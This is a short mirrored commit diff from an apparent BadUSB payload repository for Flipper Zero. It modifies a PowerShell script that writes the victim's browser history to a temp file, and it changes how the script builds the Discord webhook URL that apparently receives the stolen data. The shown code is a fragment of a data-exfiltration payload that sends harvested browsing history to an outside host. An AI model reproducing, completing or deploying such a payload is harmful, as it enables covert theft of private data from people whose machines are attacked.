mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 12:24:56 -08:00
Update main.ps1
This commit is contained in:
@@ -1,5 +1,7 @@
|
||||
|
||||
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
$whuri = "$dc"
|
||||
if ($whuri.Length -lt 120){
|
||||
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
$outpath = "$env:temp\browser_history.txt"
|
||||
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII
|
||||
|
||||
Reference in New Issue
Block a user